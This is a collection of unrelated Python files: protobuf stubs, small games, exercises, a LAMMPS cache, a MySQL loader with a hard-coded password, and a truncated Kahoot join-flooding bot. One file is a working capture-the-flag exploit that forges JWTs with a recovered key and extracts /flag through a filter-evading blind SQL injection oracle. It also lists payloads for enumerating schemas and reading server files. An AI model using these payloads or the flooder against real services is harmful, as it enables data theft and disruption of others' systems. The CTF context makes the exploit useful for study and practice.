        def ClearField(self, field_name: typing_extensions___Literal[u"attributes",b"attributes",u"dropped_attributes_count",b"dropped_attributes_count",u"span_id",b"span_id",u"trace_id",b"trace_id",u"trace_state",b"trace_state"]) -> None: ...
    type___Link = Link
    trace_id: builtin___bytes = ...
    span_id: builtin___bytes = ...
    trace_state: typing___Text = ...
    parent_span_id: builtin___bytes = ...
    name: typing___Text = ...
    kind: type___Span.SpanKindValue = ...
    start_time_unix_nano: builtin___int = ...
    end_time_unix_nano: builtin___int = ...
    dropped_attributes_count: builtin___int = ...
    dropped_events_count: builtin___int = ...
    dropped_links_count: builtin___int = ...
    @property
    def attributes(self) -> google___protobuf___internal___containers___RepeatedCompositeFieldContainer[opentelemetry___proto___common___v1___common_pb2___AttributeKeyValue]: ...
    @property
    def events(self) -> google___protobuf___internal___containers___RepeatedCompositeFieldContainer[type___Span.Event]: ...
    @property
    def links(self) -> google___protobuf___internal___containers___RepeatedCompositeFieldContainer[type___Span.Link]: ...
    @property
    def status(self) -> type___Status: ...
    def __init__(self,
        *,
        trace_id : typing___Optional[builtin___bytes] = None,
        span_id : typing___Optional[builtin___bytes] = None,
        trace_state : typing___Optional[typing___Text] = None,
        parent_span_id : typing___Optional[builtin___bytes] = None,
        name : typing___Optional[typing___Text] = None,
        kind : typing___Optional[type___Span.SpanKindValue] = None,
        start_time_unix_nano : typing___Optional[builtin___int] = None,
        end_time_unix_nano : typing___Optional[builtin___int] = None,
        attributes : typing___Optional[typing___Iterable[opentelemetry___proto___common___v1___common_pb2___AttributeKeyValue]] = None,
        dropped_attributes_count : typing___Optional[builtin___int] = None,
        events : typing___Optional[typing___Iterable[type___Span.Event]] = None,
        dropped_events_count : typing___Optional[builtin___int] = None,
        links : typing___Optional[typing___Iterable[type___Span.Link]] = None,
        dropped_links_count : typing___Optional[builtin___int] = None,
        status : typing___Optional[type___Status] = None,
        ) -> None: ...
    if sys.version_info >= (3,):
        @classmethod
        def FromString(cls, s: builtin___bytes) -> Span: ...
    else:
        @classmethod
        def FromString(cls, s: typing___Union[builtin___bytes, builtin___buffer, builtin___unicode]) -> Span: ...
    def HasField(self, field_name: typing_extensions___Literal[u"status",b"status"]) -> builtin___bool: ...
    def ClearField(self, field_name: typing_extensions___Literal[u"attributes",b"attributes",u"dropped_attributes_count",b"dropped_attributes_count",u"dropped_events_count",b"dropped_events_count",u"dropped_links_count",b"dropped_links_count",u"end_time_unix_nano",b"end_time_unix_nano",u"events",b"events",u"kind",b"kind",u"links",b"links",u"name",b"name",u"parent_span_id",b"parent_span_id",u"span_id",b"span_id",u"start_time_unix_nano",b"start_time_unix_nano",u"status",b"status",u"trace_id",b"trace_id",u"trace_state",b"trace_state"]) -> None: ...
type___Span = Span
class Status(google___protobuf___message___Message):
    """Stub: span completion status — a gRPC-style status code plus message."""
    DESCRIPTOR: google___protobuf___descriptor___Descriptor = ...
    StatusCodeValue = typing___NewType('StatusCodeValue', builtin___int)
    type___StatusCodeValue = StatusCodeValue
    class StatusCode(object):
        """Enum wrapper mirroring the canonical gRPC status codes (0 = Ok)."""
        DESCRIPTOR: google___protobuf___descriptor___EnumDescriptor = ...
        @classmethod
        def Name(cls, number: builtin___int) -> builtin___str: ...
        @classmethod
        def Value(cls, name: builtin___str) -> Status.StatusCodeValue: ...
        @classmethod
        def keys(cls) -> typing___List[builtin___str]: ...
        @classmethod
        def values(cls) -> typing___List[Status.StatusCodeValue]: ...
        @classmethod
        def items(cls) -> typing___List[typing___Tuple[builtin___str, Status.StatusCodeValue]]: ...
        Ok = typing___cast(Status.StatusCodeValue, 0)
        Cancelled = typing___cast(Status.StatusCodeValue, 1)
        UnknownError = typing___cast(Status.StatusCodeValue, 2)
        InvalidArgument = typing___cast(Status.StatusCodeValue, 3)
        DeadlineExceeded = typing___cast(Status.StatusCodeValue, 4)
        NotFound = typing___cast(Status.StatusCodeValue, 5)
        AlreadyExists = typing___cast(Status.StatusCodeValue, 6)
        PermissionDenied = typing___cast(Status.StatusCodeValue, 7)
        ResourceExhausted = typing___cast(Status.StatusCodeValue, 8)
        FailedPrecondition = typing___cast(Status.StatusCodeValue, 9)
        Aborted = typing___cast(Status.StatusCodeValue, 10)
        OutOfRange = typing___cast(Status.StatusCodeValue, 11)
        Unimplemented = typing___cast(Status.StatusCodeValue, 12)
        InternalError = typing___cast(Status.StatusCodeValue, 13)
        Unavailable = typing___cast(Status.StatusCodeValue, 14)
        DataLoss = typing___cast(Status.StatusCodeValue, 15)
        Unauthenticated = typing___cast(Status.StatusCodeValue, 16)
    # Message-level re-exports of the enum values (protobuf-stub convention).
    Ok = typing___cast(Status.StatusCodeValue, 0)
    Cancelled = typing___cast(Status.StatusCodeValue, 1)
    UnknownError = typing___cast(Status.StatusCodeValue, 2)
    InvalidArgument = typing___cast(Status.StatusCodeValue, 3)
    DeadlineExceeded = typing___cast(Status.StatusCodeValue, 4)
    NotFound = typing___cast(Status.StatusCodeValue, 5)
    AlreadyExists = typing___cast(Status.StatusCodeValue, 6)
    PermissionDenied = typing___cast(Status.StatusCodeValue, 7)
    ResourceExhausted = typing___cast(Status.StatusCodeValue, 8)
    FailedPrecondition = typing___cast(Status.StatusCodeValue, 9)
    Aborted = typing___cast(Status.StatusCodeValue, 10)
    OutOfRange = typing___cast(Status.StatusCodeValue, 11)
    Unimplemented = typing___cast(Status.StatusCodeValue, 12)
    InternalError = typing___cast(Status.StatusCodeValue, 13)
    Unavailable = typing___cast(Status.StatusCodeValue, 14)
    DataLoss = typing___cast(Status.StatusCodeValue, 15)
    Unauthenticated = typing___cast(Status.StatusCodeValue, 16)
    type___StatusCode = StatusCode
    code: type___Status.StatusCodeValue = ...
    message: typing___Text = ...
    def __init__(self,
        *,
        code : typing___Optional[type___Status.StatusCodeValue] = None,
        message : typing___Optional[typing___Text] = None,
        ) -> None: ...
    if sys.version_info >= (3,):
        @classmethod
        def FromString(cls, s: builtin___bytes) -> Status: ...
    else:
        @classmethod
        def FromString(cls, s: typing___Union[builtin___bytes, builtin___buffer, builtin___unicode]) -> Status: ...
    def ClearField(self, field_name: typing_extensions___Literal[u"code",b"code",u"message",b"message"]) -> None: ...
type___Status = Status
|
'''
@title Text Adventure: Room Class
@author Carlos Barcelos
@date 06 January 2019
The room class with member variables and functions.
'''
import src.stdlib as std # Import standard libraries
from src.Item import Item # Work with Item objects
from src.Enemy import Enemy # Work with Enemy objects
from src.Equipment import Equipment # Work with Equipment objects
class Room():
    """A single location in the game world.

    Built from the room's dictionary key (*name*), its JSON *details*
    blob and the shared *resources* table; the parsed fields produced by
    the module-level ``toRoom`` are unpacked onto the instance.
    """

    def __init__(self, name, details, resources):
        self.name = name
        parsed = toRoom(details, resources)
        for field in ('title', 'description', 'items', 'examine', 'use',
                      'ability', 'enemies', 'connections', 'area', 'icon',
                      'coordinates', 'visited'):
            setattr(self, field, parsed[field])

    def __str__(self):
        """The room's dictionary key doubles as its display name."""
        return str(self.name)

    def toJSON(self):
        """Serialise the room back into a JSON-compatible dict.

        Items collapse to their dictionary names; enemies serialise
        themselves via their own ``toJSON``.
        """
        return {
            'title': self.title,
            'description': self.description,
            'items': [item.dictName for item in self.items],
            'examine': self.examine,
            'use': self.use,
            'ability': self.ability,
            'enemies': [enemy.toJSON() for enemy in self.enemies],
            'connections': self.connections,
            'area': self.area,
            'icon': self.icon,
            'coordinates': self.coordinates,
            'visited': self.visited,
        }
# Convert from a JSON string to a room object
def toRoom(details, resources):
    """Translate a JSON *details* dict into a plain room dict.

    Required keys are read directly (a missing one raises KeyError);
    'items' and 'enemies' are materialised into objects, and the
    remaining optional keys fall back to None / {}.
    """
    room = {key: details[key]
            for key in ('title', 'description', 'connections', 'area',
                        'icon', 'coordinates', 'visited')}
    # Optional collections: absent keys become empty lists.
    room['items'] = [std.itemNameToObject(entry, resources)
                     for entry in details.get('items', [])]
    room['enemies'] = [Enemy(spec['name'], spec, resources)
                       for spec in details.get('enemies', [])]
    room['examine'] = details.get('examine')
    room['use'] = details.get('use')
    room['ability'] = details.get('ability', {})
    return room
|
# coding=utf-8
# 一个一个读取
# select load_file('E:\flag.txt')
# select ascii(mid((select load_file('E:\flag.txt')),1,1));
# 直接注入表读取
# create table abc(cmd text);
# insert into abc(cmd) values (load_file('E:\flag.txt'));
# select * from abc;
import jwt
import requests
import re
requests.packages.urllib3.disable_warnings()
# HMAC key for forging the JWT (recovered earlier from the 'news' claim).
key = "xRt*YMDqyCCxYxi9a@LgcGpnmM2X8i&6"
url = "http://challenge-6761886944b031a8.sandbox.ctfhub.com:10080/"
# Local Burp/inspection proxy (only used by the commented-out requests below).
proxies = {"http":"http://127.0.0.1:8080","https":"http://127.0.0.1:8080"}
# info = jwt.decode("eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoiYWRtaW4iLCJuZXdzIjoia2V5OnhSdCpZTURxeUNDeFl4aTlhQExnY0dwbm1NMlg4aSY2In0.EpNdctJ5Knu4ZkRcatsyMOxas1QgomB0Z49qb7_eoVg",key,algorithms=['HS256'])
# if info:
#     print(info)
# Earlier enumeration stages (database name, schemata, tables, columns),
# kept for reference; the `<a>` fragments split SQL keywords to evade a filter:
# payloadTmpl = "i'/**/or/**/ascii(mid(database(),{},1))>{}#"
# payloadTmpl = "i'/**/or/**/ascii(mid((s<a>elect/**/g<a>roup_con<a>cat(sc<a>hema_name)/**/fr<a>om/**/info<a>rmation_sc<a>hema.S<a>CHEMATA),{},1))>{}#"
# payloadTmpl = "i'/**/or/**/ascii(mid((s<a>elect/**/g<a>roup_con<a>cat(ta<a>ble_name)/**/fr<a>om/**/info<a>rmation_sc<a>hema.t<a>ables/**/wher<a>e/**/ta<a>ble_s<a>chema=dat<a>abase()),{},1))>{}#"
# payloadTmpl = "i'/**/or/**/ascii(mid((s<a>elect/**/g<a>roup_con<a>cat(col<a>umn_name)/**/fr<a>om/**/info<a>rmation_sc<a>hema.c<a>olumns/**/wher<a>e/**/ta<a>ble_s<a>chema=dat<a>abase()),{},1))>{}#"
# Final stage: read /flag byte by byte via a boolean (ascii > mid) oracle.
payloadTmpl = "i'/**/or/**/ascii(mid((se<a>lect/**/lo<a>ad_fi<a>le('/fl<a>ag')),{},1))>{}#"
def half_interval():
    """Recover the blind-SQL-injection result one character at a time.

    For each of up to 54 positions, binary-searches the ASCII range
    [32, 127) by asking the oracle whether the character code exceeds the
    midpoint, then appends the resolved character and prints the partial
    result.  Uses the module-level ``payloadTmpl``/``key``/``url``.

    Fix: the original shadowed the builtins ``min`` and ``max`` with its
    search bounds; they are renamed ``lo``/``hi`` (logic unchanged).
    """
    result = ""
    for pos in range(1, 55):
        lo = 32
        hi = 127
        while abs(hi - lo) > 1:
            mid = (lo + hi) // 2
            payload = payloadTmpl.format(pos, mid)
            jwttoken = {
                "user": payload,
                "news": "success"
            }
            # NOTE(review): .decode("ascii") implies PyJWT 1.x (bytes);
            # PyJWT 2.x returns str — confirm the pinned version.
            payload = jwt.encode(jwttoken, key, algorithm='HS256').decode("ascii")
            cookies = dict(token=str(payload))
            res = requests.get(url, cookies=cookies)
            # res = requests.get(url,cookies=cookies,proxies=proxies)
            if re.findall("success", res.text) != []:
                lo = mid  # oracle says "greater" -> raise the lower bound
            else:
                hi = mid
        result += chr(hi)
        print(result)
if __name__ == "__main__":
    half_interval()
# Manual single-probe debugging snippet, kept from development:
# payload = payloadTmpl.format(1,32)
# jwttoken = {
#     "user": payload,
#     "news": "success"
# }
# print(jwttoken)
# payload = jwt.encode(jwttoken, key, algorithm='HS256').decode("ascii")
# print(payload)
# cookies = dict(token=str(payload))
# res = requests.get(url,cookies=cookies,proxies=proxies)
# res.encoding='utf-8'
# print(res.text)
from adapters.generic.motion_sensor import MotionSensorAdapter
from adapters.generic.temp_hum_sensor import TemperatureHumiditySensorAdapter
# Maps SONOFF Zigbee model identifiers to their adapter classes.
sonoff_adapters = {
    'SNZB-02': TemperatureHumiditySensorAdapter, # SONOFF Temperature and humidity sensor
    'SNZB-03': MotionSensorAdapter, # SONOFF Motion sensor
}
|
# 함수명: sumEven1, 매개변수: 가변형, 리턴값: 1개
# 기능: 아규먼트가 몇 개가 전달되든 처리해야 한다.
# 아규먼트는 1 이상의 숫자만 온다고 정한다.
# 전달된 아규먼트들에서 짝수에 해당하는 숫자들만 합을 계산해서 리턴한다.
# 전달된 아규먼트들 중에서 짝수가 없으면 0을 리턴한다.
# 아규먼트가 전달되지 않으면 -1을 리턴한다.
def sumEven1(*ints):
    """Return the sum of the even arguments.

    Returns -1 when called with no arguments, and 0 when none of the
    arguments is even.  Arguments are assumed to be integers >= 1.

    Fix: the original accumulated into a local named ``sum``, shadowing
    the builtin; it now uses the builtin ``sum`` over a generator.
    """
    if not ints:
        return -1
    return sum(num for num in ints if num % 2 == 0)
print(sumEven1())  # -1: no arguments
print(sumEven1(1, 3, 5, 7))  # 0: no even numbers
print(sumEven1(2, 3))  # 2
print(sumEven1(2, 3, 4))  # 6
# Python 2 (print statements). Interactive credit-card simulator: accrues
# daily interest between user-entered transaction days.
def monthlyactivity(interest, principal, apr, limit, totalprin):
    # Purpose: loop over user-entered days of one month, accruing simple
    # daily interest (apr/365) on the running principal and applying
    # deposits/withdrawals; day 31 closes the month.
    # Returns [interest, principal, totalprin].
    print "enter day number from this month and transactions on that day, in order. Enter day as 31 to end simulation for this month,"
    day = 0
    prevday = 0
    while day<31:
        day = int(input("enter day number: "))
        if day == 31:
            # Month end: accrue interest for the remaining days, snapshot
            # the principal, then either stop entirely or start a new month.
            newinterest = (day-prevday) * (apr/365) * principal
            interest+=newinterest
            totalprin=principal
            check = int(input("would you like to end the entire simulation? Enter 1 for 'yes' and 0 for 'no':"))
            if check ==1:
                break
            else:
                #principal = 0.0
                day = 0
                prevday = 0
                # Rounded to cents via int(x*100 + 0.5)/100.0 (manual rounding).
                print "at the end of this month, total pending = $" + str(int(((totalprin+interest)*100) + 0.5)/100.0)
                continue
        else:
            if(day>31) or (day<=prevday):
                # Reject out-of-range or non-increasing days and re-prompt.
                day = prevday
                print "your day was either before the previous day or more than 31. Retry entering the day"
                continue
            else:
                # Accrue interest for the gap since the previous entry.
                newinterest = (day-prevday) * (apr/365) * principal
                interest+=newinterest
                counter = 0
                transact =0
                activity = 0
                print "enter transactions now. Eg, for deposit of $100, type '-100', and for withdrawal of $100, type '100'. Enter 0 for ending this day's transactions"
                # Inner loop: one transaction per iteration until 0 or bad input.
                while (counter==0 or transact!=0):
                    counter = 1
                    try:
                        transact = float(input("transaction: "))
                        if transact == 0.0:
                            break
                    # NOTE(review): bare except also ends the day on any
                    # malformed input — presumably intentional; confirm.
                    except:
                        break
                    else:
                        if principal+transact<0:
                            # Deposit larger than the balance: cap at zero.
                            print "your deposit was too much and $" + str(-1*(principal+transact)) + " of it has been returned"
                            principal = 0
                        elif principal+transact>limit:
                            # Withdrawal would exceed the credit limit: decline.
                            print "your withdrawal was too much and $" + str(transact) + " has been declined"
                        else:
                            activity+=transact
                            principal+=transact
                prevday = day
    return [interest, principal, totalprin]
def main():
    # Collect APR and credit limit (with defaults on bad input), run the
    # interactive simulation, then print the final payable amount.
    try:
        apr = float(input("Enter apr as a decimal. Eg: 25% is 0.25 : " ))
    except:
        apr = 0.25  # default APR when input is malformed
    try:
        limit = float(input("enter credit limit: "))
    except:
        limit = 1000.0  # default credit limit
    principal = 0.0
    interest = 0.0
    totalprin = 0.0
    result = monthlyactivity(interest, principal, apr, limit, totalprin)
    interest = result[0]
    principal = result[1]
    totalprin = result[2]
    # Same manual cent-rounding as in monthlyactivity.
    print "at the end of your entire credit history for this account, total payable = $" + str(int(((totalprin+interest)*100) + 0.5)/100.0)
main()
#!/usr/bin/env python
# Funtion:
# Filename:
import logging
# Write log records to 123.log; records below INFO are filtered out.
logging.basicConfig(filename='123.log', level=logging.INFO)
# The five logging levels, from least to most severe:
logging.debug('test debug')  # suppressed: DEBUG < INFO threshold above
logging.info('test info')
logging.warning('test warning')
logging.error('test error')
logging.critical('test critical')
import MySQLdb
import MySQLdb.cursors
import traceback
def user_add():
    """Pair up e-mail addresses and user names from the storage files.

    Reads one entry per line from ``storage/email`` and ``storage/name``
    and returns a zip iterator of (email, name) tuples.
    """
    with open('storage/email', encoding='utf-8') as email_file:
        emails = [line.strip() for line in email_file]
    with open('storage/name', encoding='utf-8') as name_file:
        names = [line.strip() for line in name_file]
    return zip(emails, names)
# Connection settings for the 'library' database.
# NOTE(review): credentials are hard-coded in source — consider moving
# them to environment variables or a config file outside version control.
MYSQL_CONFIG = {
    'host': 'localhost',
    'port': 3306,
    'user': 'coder',
    'passwd': 'My1qaz2wsx',
    'db': 'library',
    'charset': 'utf8mb4',
    'cursorclass': MySQLdb.cursors.DictCursor  # rows come back as dicts
}
class Store:
    """Minimal wrapper around a MySQLdb connection.

    Fixes: the bare ``except:`` in the constructor (which also trapped
    SystemExit/KeyboardInterrupt) is narrowed to ``Exception``, and the
    SQL-keyword sniffing in ``execute_sql`` is made case-insensitive.
    """

    def __init__(self, **kwargs):
        """Open a connection with MySQLdb.connect(**kwargs).

        On failure the traceback is printed and ``self.conn`` stays
        unset (preserved from the original behaviour); later method
        calls will then raise AttributeError.
        """
        try:
            self.conn = MySQLdb.connect(**kwargs)
        except Exception:  # was a bare except: — don't swallow SystemExit etc.
            traceback.print_exc()

    def execute_sql(self, _sql, *args):
        """Run *_sql* with parameters *args*.

        SELECT statements return ``fetchall()``; statements containing
        'insert' or 'where' are executed and committed; anything else is
        rejected with a message (guard against blanket UPDATE/DELETE).
        """
        sql_lower = _sql.lower()  # case-insensitive keyword detection
        if 'select' in sql_lower:
            cur = self.conn.cursor()
            cur.execute(_sql, args)
            return cur.fetchall()
        elif 'insert' in sql_lower or 'where' in sql_lower:
            cur = self.conn.cursor()
            cur.execute(_sql, args)
            self.conn.commit()
        else:
            print('no where')

    def close(self):
        """Close the underlying connection."""
        self.conn.close()
def add_storage():
    """Insert every unique book title from the ``books`` file into the
    ``storage_storage`` table with an inventory/remainder of 1.

    Titles are stripped of Chinese book-title marks and surrounding
    whitespace; blank lines are ignored.
    """
    store = Store(**MYSQL_CONFIG)
    insert_stmt = "insert into storage_storage(book, inventory, remain, add_date)values(%s,1,1,CURDATE())"
    with open('books', encoding='utf-8') as source:
        titles = {line.replace('《', '').replace('》', '').strip()
                  for line in source}
    titles.discard('')  # drop entries produced by blank lines
    for title in titles:
        store.execute_sql(insert_stmt, title)


if __name__ == '__main__':
    add_storage()
|
from mock_data import mock_data
# Tutorial script: dict access/mutation, list basics, and iterating
# the imported mock_data product list.
me = {
    "firstname":"Shane",
    "lastname":"Dixon",
    "email":"shanedixon13@gmail.com",
    "age":25,
    "hobbies":[],
    "address":{
        "street":"Bradley Ln",
        "city":"Lonoke"
    }
}
print(me["firstname"]+" "+me["lastname"])
print(me["address"]["city"])  # nested dict access
#modify existing key
me["age"]=26
#create new key
me["new"]=1
print(me)
#list basics
names=[]
names.append("Shane")
names.append("Jake")
names.append("Guillermo")
print(names)
#get elements by index
print(names[0])
print(names[2])
#for loop
for name in names: #variable can be named anything
    print(name)
ages = [12,32,456,10,23,678,4356,2,46,789,23,67,13]
#find the youngest (manual scan; equivalent to the builtin min(ages))
x=ages[0]
for age in ages:
    if age<x:
        x=age
print(x)
#print the title of every product
# NOTE(review): assumes each mock_data entry has a "title" key — confirm.
for item in mock_data:
    print(item["title"])
import turtle
# Set up the drawing window and a turtle pen.
window = turtle.Screen()
window.bgcolor("red")

t1=turtle.Turtle()
t1.shape("turtle")
t1.color("yellow")
t1.speed(10)  # animation speed (turtle's 0-10 scale)
def draw_square(t1):
    """Draw a 100x100 square with turtle *t1*.

    Four forward/right-90 moves, so the turtle ends at its starting
    position and heading.  (Idiom fix: ``range(1, 5)`` with an unused
    loop variable becomes ``range(4)`` with ``_``.)
    """
    for _ in range(4):
        t1.forward(100)
        t1.right(90)
# Draw 35 squares, rotating 20 degrees between each, then wait for a click.
for i in range(1,36):
    draw_square(t1)
    t1.right(20)

window.exitonclick()
|
#024: Longest Increasing Subsequence
#http://rosalind.info/problems/lgis/
#Given: A positive integer n<=10000 followed by a permutation p of length n.
# Sample values (immediately overwritten by the file parse below).
n = 5
p = [5, 1, 4, 2, 3]
# Parse the Rosalind dataset: line 1 is n, line 2 the permutation.
f = open('rosalind_lgis.txt', 'r')
contents = f.read().rstrip()
f.close()
lines = contents.split('\n')
n = int(lines[0])
permutations = lines[1].split(' ')
p = [int(perm) for perm in permutations]
#Return: A longest increasing subsequence of p, followed by a longest decreasing subsequence of p.
from operator import attrgetter
def getLongestPath(p, order='increasing'):
    """Return a longest monotonic subsequence of the permutation *p*.

    *order* is 'increasing' or 'decreasing'.  Works by building a DAG in
    input order — each vertex receives edges from every earlier vertex
    that keeps the subsequence monotonic — and taking the longest path
    into a trailing sentinel vertex.

    Fixes versus the original:
    - works on a copy, so the caller's list is no longer mutated (the
      original appended the 'finish' sentinel to *p*, which corrupted a
      second call on the same list);
    - removes the dead `order == 'descending'` branch (the parameter
      value is 'decreasing', and that branch would have returned a
      single element instead of the path).
    """
    class Vertex:
        def __repr__(self):
            return "vertex " + str(self.name)

        def __init__(self, name):
            # ALL instance members should be declared here:
            self.name = name
            self.ins = []
            self.max_path = []
            self.max_path_length = 0

        def setIns(self, vts):
            # Edges come from every earlier vertex that keeps the order;
            # the sentinel accepts an edge from everything.
            for v in vts:
                if self.name == 'finish':
                    self.ins.append(v)
                elif order == 'increasing' and self.name > v.name:
                    self.ins.append(v)
                elif order == 'decreasing' and self.name < v.name:
                    self.ins.append(v)

        def setMaxPath(self):
            # Extend the longest path among the predecessors (first wins ties).
            if len(self.ins) > 0:
                best = max(self.ins, key=attrgetter('max_path_length'))
                self.max_path = best.max_path[:]
            else:
                self.max_path = []
            self.max_path.append(self.name)
            self.max_path_length = len(self.max_path) + 1

    # Copy so the caller's list is left untouched, then add the sentinel.
    elements = list(p)
    elements.append('finish')
    vertexes = []
    for element in elements:
        v = Vertex(element)
        v.setIns(vertexes)
        v.setMaxPath()
        vertexes.append(v)
    # The sentinel's path is the global optimum; drop the sentinel itself.
    return vertexes.pop().max_path[:-1]
# Python 2 driver (print statements).
asc = getLongestPath(p)
# NOTE(review): if getLongestPath leaves its sentinel in p, this second
# call sees it too — confirm p is unmodified between the two calls.
desc = getLongestPath(p, 'decreasing')
print asc
print desc
#If writing to file:
#f = open('rosalind_lgis_output.txt', 'w')
#for i in asc:
#    f.write(str(i) + ' ')
#f.write('\n')
#for i in des:
#    f.write(str(i) + ' ')
#f.write('\n')
#f.close()
|
import ctypes
import numpy
from simphony.core.cuba import CUBA
from simphony.core.keywords import KEYWORDS
from simphony.core.data_container import DataContainer
from simlammps.common.atom_style_description import get_all_attributes
class ParticleDataCache(object):
    """ Class handles particle-related data

    Class stores all particle-related data and has methods
    in order to retrieve this data from LAMMPS and send this
    data to LAMMPS.

    Parameters
    ----------
    lammps :
        lammps python wrapper
    atom_style : AtomStyle
        style of atoms
    material_atom_type_manager : MaterialAtomTypeManager
        class that manages the relationship between material-uid and atom_type

    """
    def __init__(self, lammps, atoms_style, material_atom_type_manager):
        self._lammps = lammps
        self._material_atom_type_manager = material_atom_type_manager
        # One entry per CUBA attribute this atom style carries.
        self._data_attributes = get_all_attributes(atoms_style)

        # map from uid to 'index in lammps arrays'
        self._index_of_uid = {}

        # cache of particle-related data (stored by CUBA keyword)
        self._cache = {}

        # cache of coordinates (flat list, 3 values per particle)
        self._coordinates = []

        self._cache[CUBA.MATERIAL_TYPE] = []
        for attribute in self._data_attributes:
            self._cache[attribute.cuba_key] = []

    def retrieve(self):
        """ Retrieve all data from lammps
        """
        # "x" = positions: per the call below, 3 values per atom, float (1).
        self._coordinates = self._lammps.gather_atoms("x", 1, 3)
        for attribute in self._data_attributes:
            keyword = KEYWORDS[attribute.cuba_key.name]

            # we handle material type separately
            if attribute.cuba_key == CUBA.MATERIAL_TYPE:
                # atom "type": one int (0) per atom
                self._cache[attribute.cuba_key] = self._lammps.gather_atoms(
                    "type",
                    0,
                    1)
                continue

            self._cache[attribute.cuba_key] = self._lammps.gather_atoms(
                attribute.lammps_key,
                _get_type(keyword),
                _get_count(keyword))

    def send(self):
        """ Send data to lammps
        """
        self._lammps.scatter_atoms(
            "x", 1, 3,
            (ctypes.c_double * len(self._coordinates))(*self._coordinates))
        for attribute in self._data_attributes:
            keyword = KEYWORDS[attribute.cuba_key.name]
            values = self._cache[attribute.cuba_key]

            # we handle material type separately
            if attribute.cuba_key == CUBA.MATERIAL_TYPE:
                self._lammps.scatter_atoms("type",
                                           0,
                                           1,
                                           (ctypes.c_int * len(
                                               values))(*values))
                continue

            self._lammps.scatter_atoms(attribute.lammps_key,
                                       _get_type(keyword),
                                       _get_count(keyword),
                                       (_get_ctype(keyword) * len(values))(
                                           *values))

    def get_particle_data(self, uid):
        """ get particle data

        Parameters
        ----------
        uid : UUID
            uid for particle

        Returns
        -------
        data : DataContainer
            data of the particle
        """
        data = DataContainer()
        index = self._index_of_uid[uid]
        for attribute in self._data_attributes:
            # we handle material type separately
            if attribute.cuba_key == CUBA.MATERIAL_TYPE:
                # convert from the integer atom_type to material-uid
                data[CUBA.MATERIAL_TYPE] = \
                    self._material_atom_type_manager.get_material_uid(
                        self._cache[CUBA.MATERIAL_TYPE][index])
                continue
            # Multi-valued attributes are stored flattened; slice them out.
            count = _get_count(KEYWORDS[attribute.cuba_key.name])
            i = index * count
            if count > 1:
                # always assuming that its a tuple
                # ( see https://github.com/simphony/simphony-common/issues/18 )
                data[attribute.cuba_key] = tuple(
                    self._cache[attribute.cuba_key][i:i+count])
            else:
                data[attribute.cuba_key] = self._cache[attribute.cuba_key][i]
        return data

    def get_coordinates(self, uid):
        """ Get coordinates for a particle

        Parameters
        ----------
        uid : uid
            uid of particle
        """
        i = self._index_of_uid[uid] * 3
        coordinates = self._coordinates[i:i+3]
        return tuple(coordinates)

    def set_particle(self, coordinates, data, uid):
        """ set particle coordinates and data

        Parameters
        ----------
        coordinates : tuple of floats
            particle coordinates
        data : DataContainer
            data of the particle
        uid : uuid
            uuid of the particle
        """
        # New uids are appended at the end of the flattened arrays.
        if uid not in self._index_of_uid:
            self._index_of_uid[uid] = len(self._index_of_uid)
        i = self._index_of_uid[uid] * 3
        self._coordinates[i:i+3] = coordinates[0:3]
        index = self._index_of_uid[uid]

        # add each attribute
        for attribute in self._data_attributes:
            value = data[attribute.cuba_key]
            if attribute.cuba_key == CUBA.MATERIAL_TYPE:
                # convert to atom_type (int)
                value = self._material_atom_type_manager.get_atom_type(value)
            self._add_to_cache(attribute.cuba_key,
                               index,
                               value)

    def _add_to_cache(self, cuba_key, index, value):
        """ Add value to cache

        Parameters
        ----------
        cuba_key : CUBA
            cuba key
        index : int
            index in cache
        value : float or int or float[3] or int[3]
            value added to cache
        """
        keyword = KEYWORDS[cuba_key.name]
        shape = keyword.shape
        if shape == [1]:
            # Scalar: overwrite in place or append exactly at the end;
            # a gap would mean indices are out of sync with uids.
            if index < len(self._cache[cuba_key]):
                self._cache[cuba_key][index] = value
            elif index == len(self._cache[cuba_key]):
                self._cache[cuba_key].append(value)
            else:
                msg = "Problem with index {}".format(index)
                raise IndexError(msg)
        elif shape == [3]:
            # Vector: three consecutive slots in the flattened list.
            index = index * 3
            self._cache[cuba_key][index:index+3] = value[0:3]
        else:
            raise RuntimeError("Unsupported shape: {0}".format(shape))
def _get_ctype(keyword):
    """ get ctype

    Map the keyword's numpy dtype onto the matching ctypes type.

    Parameters
    ----------
    keyword : Keyword
    """
    dtype = keyword.dtype
    if dtype == numpy.int32:
        return ctypes.c_int
    if dtype == numpy.float64:
        return ctypes.c_double
    raise RuntimeError(
        "Unsupported type {}".format(dtype))
def _get_type(keyword):
    """ get type

    Get type which is a 1 or 0 to signify if its a
    int or float for lammps gather/scatter methods

    Parameters
    ----------
    keyword : Keyword
    """
    dtype = keyword.dtype
    if dtype == numpy.int32:
        return 0
    if dtype == numpy.float64:
        return 1
    raise RuntimeError(
        "Unsupported type {}".format(dtype))
def _get_count(keyword):
    """ get count type

    Number of values per atom (1 for scalars, 3 for vectors).

    Parameters
    ----------
    keyword : Keyword
    """
    shape = keyword.shape
    if shape == [1]:
        return 1
    if shape == [3]:
        return 3
    raise RuntimeError("Unsupported shape: {0}".format(shape))
|
#!/usr/bin/env python3
import argparse
import os
import random
import sys
import threading
from itertools import count
from string import ascii_letters, digits
from colorama import Fore
from kahoot import client
def getargs():
    """Parse CLI arguments: game code, thread count, nickname mode."""
    parser = argparse.ArgumentParser(description='Kahoot Flooder Bot - Created by Music_Dude#0001')
    parser.add_argument('code', metavar='CODE', type=int)
    parser.add_argument('-t', '--threads', type=int, default=1, help='number of threads to run in each process')
    # --nick and --random-nick are mutually exclusive.
    group = parser.add_mutually_exclusive_group()
    group.add_argument('-n', '--nick', type=str, default='', metavar='NICK', help='nickname to use, e.g. nick1, nick2...')
    group.add_argument('-r', '--random-nick', dest='rand', action='store_true', help='join using random nicknames')
    return parser.parse_args()
def main():
    # Worker loop: join repeatedly under sequential or random nicknames.
    # NOTE(review): the global counter `i` is read and incremented from
    # multiple threads without a lock — duplicates/races are possible.
    global i
    while True:
        if args.rand:
            name = ''.join(random.choices(ascii_letters + digits, k=8))
        else:
            name = args.nick + str(i+1)
        if client().join(args.code, name) is None:
            print(f'{Fore.LIGHTBLUE_EX}{threading.current_thread().getName():10}{Fore.RESET} | {Fore.MAGENTA}{i+1:^3}{Fore.RESET} | Joining as {Fore.RED}{name}{Fore.RESET}')
        else:
            print(f'{Fore.RED}Failed to join {args.code}!{Fore.RESET}')
            exit(1)
        i += 1
if __name__ == '__main__':
    args = getargs()
    threads = []
